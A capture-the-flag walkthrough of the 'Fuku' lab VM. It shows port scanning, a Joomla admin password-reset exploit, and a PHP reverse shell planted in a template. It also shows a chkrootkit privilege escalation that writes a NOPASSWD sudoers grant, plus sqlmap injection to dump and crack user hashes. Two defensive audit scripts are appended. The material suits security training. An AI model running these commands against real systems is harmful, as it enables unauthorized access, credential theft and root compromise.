SecTalks: BNE0x02 - Fuku

Tools:

  • netdiscover
  • Nmap
  • Netcat
  • Wfuzz
  • Nikto
  • Joomscan

Vulnerability:

Use the Joomla! Remote Admin Change Password exploit

Use netdiscover to detect the target IP address:

netdiscover -i eth0 -r 192.168.56.0/24

192.168.56.134 is the target.

Then run nmap to detect open ports and the services running on the target machine:

nmap -sV -v -O -A -T5 192.168.56.134 -p-

As we can see, almost every port appears open. I guess the target machine doesn't want a hacker to know which services are really running.

I used nc to read the banners from a few ports, such as 80, 22 and 23. Port 22 returns something like:

SSH-2.0-OpenSSH 6.7p1 Ububtu-5ubuntu1

while the rest of the ports all return the same kind of response:

It looks like I need to filter out ports like these, so I wrote a script, filter.py, to make life easier.

After running the script, I find that only port 22 and port 13370 are really open.

Checking http://192.168.56.134:13370 gives this page:

Reviewing the page source:

It looks like Joomla!

Use wfuzz to scan for paths:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.56.134:13370/FUZZ 2>/dev/null

This turns up some interesting path names.

Use Nikto to scan:

nikto -h http://192.168.56.134:13370

Checking http://192.168.56.134:13370/administrator/ gives the login page:

Now I can confirm it is Joomla!

Use joomscan to scan:

joomscan -u http://192.168.56.134:13370

The result:

Follow the steps:

  • input a new password for admin

Since it is the Japanese version, I followed my sickos1.2 post to upload the PHP reverse shell (/usr/share/webshells/php/php-reverse-shell.php).

I edit the beez template file, paste the PHP reverse shell code into it and replace the IP address and port.

Set up netcat and get the shell.

However, I cannot execute most commands, not even python.

Try:

python2.7 -c 'import pty; pty.spawn("/bin/bash")'

It works!

Now try to enumerate the OS.

ps aux |grep root

It looks like chkrootkit 0.49 is running as root.

As in my previous post sickos1.2, this version of chkrootkit executes /tmp/update as root when that file exists, so I used it to get root:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Then make it executable:

chmod 777 /tmp/update

Then wait for chkrootkit to run and check that /etc/sudoers has been rewritten:

ls -al /etc/sudoers

Finally, get root:

sudo su
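From the defender's side, the line appended above is what an integrity check on /etc/sudoers should catch. The following is an added example, not code from the original post: it scans a sudoers text for NOPASSWD grants to service accounts and checks the 0440 mode that sudo expects. The sudoers content is a constructed sample, and the list of service accounts is an assumption about local policy.

```python
"""Audit a sudoers file for the tampering shown above (added example)."""
import os
import re
import stat
import tempfile

# Assumption: accounts that should never hold sudo rights on this host.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# user  host = [(runas)] [tags:] commands
GRANT = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?P<spec>.+)$")


def find_risky_grants(text):
    """Return (user, spec) for every NOPASSWD grant to a service account."""
    risky = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith(("Defaults", "%", "@")) or "_Alias" in line:
            continue
        m = GRANT.match(line)
        if m and m.group("who") in SERVICE_ACCOUNTS and "NOPASSWD" in m.group("spec"):
            risky.append((m.group("who"), m.group("spec").strip()))
    return risky


def mode_ok(path, expected=0o440):
    """sudo expects sudoers to be mode 0440; anything looser is a red flag."""
    return stat.S_IMODE(os.stat(path).st_mode) == expected


def audit(path):
    """Combine the content check and the mode check for one file."""
    with open(path, encoding="utf-8") as fh:
        grants = find_risky_grants(fh.read())
    return {"mode_ok": mode_ok(path), "risky": grants}


# Constructed sample: a stock-looking file with the grant from the post appended.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD: ALL
"""


def demo():
    """Write the sample to a temp file with the expected mode and audit it."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_SUDOERS)
    os.chmod(path, 0o440)
    try:
        return audit(path)
    finally:
        os.chmod(path, 0o600)
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Note that the payload in the post restores mode 440 after appending, so a mode check alone passes; it is the content check (or a hash of the file compared against a known-good copy) that flags the added grant.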

Exploit Joomla HD FLV Player SQL Injection

On http://192.168.56.134/, I found that the target uses HD FLV Player.

Check the source code:

searchsploit HD FLV

Follow the instructions from the exploit entry:

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql --tables --level=5 --risk=3

Now get the columns of the table jos_users:

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users --columns

Now I am interested in the columns username and password:

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users -C username,password --dump

The first part should be the hash and the second part the salt. I used the Joomla password cracking tool joomlacrack.pl; here is also my Python version, crackjoomla.py.

Crack admin's password now.

Then log in as admin and upload the PHP reverse shell, the same as in the first part of this post.

Also, since the hash format is hash:salt, I looked at the hashcat example hashes: the MD5 format is md5($pass.$salt), so the value for the hashcat option -m should be 10 (run hashcat --help and check the Hash types list).

Use hashcat to crack:

hashcat -m 10 -a 0 -o joompass.txt --remove 61.hash /usr/share/wordlists/rockyou.txt
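The hash:salt format and the md5($pass.$salt) order described above are easy to get wrong, so here is an added example (not code from the original post, nor Joomla's own) that builds and verifies a legacy Joomla hash in exactly that form and audits a dumped user table for accounts still stored that way. The rows and passwords are constructed; the bcrypt-shaped value is a placeholder.

```python
"""Legacy Joomla password hashes: "<md5hex>:<salt>" with md5(password + salt)."""
import hashlib
import hmac


def make_legacy_hash(password: str, salt: str) -> str:
    """Build a legacy hash the way hashcat mode 10 (md5($pass.$salt)) reads it."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def parse_legacy_hash(stored: str):
    """Split "hash:salt"; return (hash, salt) or None if it is not that format."""
    if stored.count(":") != 1:
        return None
    digest, salt = stored.split(":")
    digest = digest.lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        return None
    return digest, salt


def legacy_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a legacy hash."""
    parsed = parse_legacy_hash(stored)
    if parsed is None:
        return False
    digest, salt = parsed
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, digest)


def needs_rehash(stored: str) -> bool:
    """True for the legacy salted-MD5 format, False for bcrypt ($2y$/$2a$)
    hashes, which newer Joomla versions store instead."""
    if stored.startswith(("$2y$", "$2a$")):
        return False
    return parse_legacy_hash(stored) is not None


def audit_users(rows):
    """rows: (username, password_hash) pairs as dumped from jos_users.
    Returns the usernames whose password is still a legacy MD5:salt hash."""
    return [user for user, pw in rows if needs_rehash(pw)]


# Constructed sample rows, not data from the target machine.
SAMPLE_ROWS = [
    ("admin", make_legacy_hash("constructed-pass", "nfXqlwSRPIQ9PAWG")),
    ("editor", "$2y$10$" + "x" * 53),  # placeholder bcrypt-shaped value
]

if __name__ == "__main__":
    print(audit_users(SAMPLE_ROWS))  # accounts to force a password reset on
```

Unsalted or salted MD5 is what makes the rockyou run above feasible; the audit function is the list of accounts a site owner should migrate to bcrypt at next login.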

DONE